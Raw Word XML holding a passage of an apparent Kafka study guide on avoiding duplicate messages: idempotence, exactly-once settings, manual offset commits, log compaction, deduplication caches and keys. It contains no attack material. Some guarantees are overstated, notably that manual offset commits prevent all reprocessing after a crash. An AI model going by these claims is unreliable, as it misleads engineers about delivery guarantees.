    <w:p w14:paraId="43F20BF9" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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onsumer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers track offsets manually and ensure that they don't reprocess a message. Kafka keeps track of what messages a consumer has processed and guarantees that each message is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C222EE"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Kafka configuration for exactly-once semantics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC2C546" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Producer configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416ECD7" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="155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acks=all: Ensures that the producer waits for acknowledgment from all replicas before considering the message sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88C8DA" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="155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ransactional.id: Enables transaction support to ensure that messages are delivered exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E1762" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="155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nable.idempotence=true: Ensures that even in case of retries, no message is delivered more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623C951" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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onsumer configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF038B" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="155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nable.auto.commit=false: This disables auto-commit of offsets, allowing manual control over when an offset is committed, thereby preventing reprocessing of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67A5A4" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="155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Offset management and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual commit</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure that messages are only processed once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A5C9E"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD003A5" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Prevents duplication across the entire pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: From production to consumption, the message is ensured to be processed exactly once. This guarantees consistency even in the case of failures or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628C082" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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ritical for stateful processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In use cases where stateful stream processing is performed (e.g., aggregations or joins), exactly-once semantics ensures that intermediate results are correct and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E26D2"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3. Consumer Offset Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D44033" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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essage duplication can occur if a consumer reprocesses messages it has already consumed. To avoid this, consumers need to manage their offsets carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFAC63"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53750CDC" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Manual offset management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: By disabling </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-commit</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of offsets (i.e., enable.auto.commit=false), consumers can manually commit offsets only after successfully processing the messages. This ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>if a consumer crashes, it can resume from the last successfully processed message rather than reprocessing messages that have already been consumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B24EB" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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toring offsets externally</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, offsets are stored outside Kafka (e.g., in a database) to maintain more control over when and how offsets are committed, further ensuring accurate tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4432C6"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CA2E1" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Prevents reprocessing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manual offset management guarantees that consumers do not process the same message more than once, even if the consumer crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1807B"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4. Log Compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740ADA81" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Kafka’s </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature helps with deduplication, especially when only the most recent version of a message is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D6F50"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045431FF" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that Kafka retains only the most recent message for each key in a topic. Older messages with the same key are deleted. This is useful when only the latest value of a key matters (e.g., when processing user profile updates where only the latest profile matters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EC6A0" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In cases where multiple updates to the same key are sent (e.g., updating a user’s information), Kafka will retain only the last value for that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6AA70"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Kafka configuration for log compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E255B02" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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et cleanup.policy=compact in the topic configuration. This ensures that Kafka keeps only the latest message for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A215124"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B329DD4" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Reduces duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For use cases where you care about the latest value of a key, log compaction ensures that the log doesn’t grow unnecessarily large with older versions of the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDDC05B"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5. Deduplication at Consumer Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392943F1" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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In scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotence</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not feasible or required, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deduplication at the consumer level</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help prevent the processing of duplicate messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F204911"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A00D2F" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Consumers can maintain a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deduplication cache</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., in memory or in an external database) to track which messages have already been processed based on unique identifiers (such as message keys or custom IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B268F3A" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Before processing a new message, the consumer checks the cache to ensure that it has not already processed the message. If the message is in the cache, it is skipped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71518506"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F693907" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers have full control over the deduplication process and can handle it according to specific business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDB980" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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an be used in combination</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with other deduplication methods (e.g., idempotence or log compaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23825C49"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6. Producer Message Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B2EDD" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Kafka uses </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message keys</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine which partition a message will be written to. If you use the same key for related messages, they will always go to the same partition, which helps maintain message order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE1C607"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76CA0B" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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By using a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent keying strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for related messages, Kafka ensures that related messages are written to the same partition, reducing the chances of consuming the same message multiple times by different consumers in a consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431D71F" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Key-based deduplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By tracking the messages using the key, consumers can identify and skip messages that have already been processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771692E8" w14:textId="77777777" w:rsidR="00E62872"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B68E3A0">
          <v:rect id="_x0000_i3239" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EB589" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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Summary of Techniques to Prevent Message Duplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275707F0" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Idempotent Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Guarantees that messages are not written more than once, even in case of retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D83A62" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Guarantees end-to-end message processing without duplication across producers, brokers, and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244A449" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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onsumer Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents consumers from reprocessing messages by manually committing offsets after successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F4076" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Log Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that only the latest version of a key’s message is retained in Kafka, which is useful for scenarios where only the most recent state matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738D4B2" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Deduplication at Consumer Level</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can cache and track unique identifiers to avoid processing the same message multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4484CF" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Producer Message Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures related messages are sent to the same partition, which helps in maintaining message order and simplifying deduplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A7D25C" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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lastRenderedPageBreak/>
        <w:t>By using one or more of these techniques, you can significantly reduce the likelihood of message duplication in Kafka, ensuring that your system operates efficiently and without inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB5D3F" w14:textId="462F355C"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B064AF8">
          <v:rect id="_x0000_i3240" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25360B" w14:textId="74597E9C" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D77D57" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="810" w:name="_Toc196308290"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What would you do if a Kafka consumer is lagging behind</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
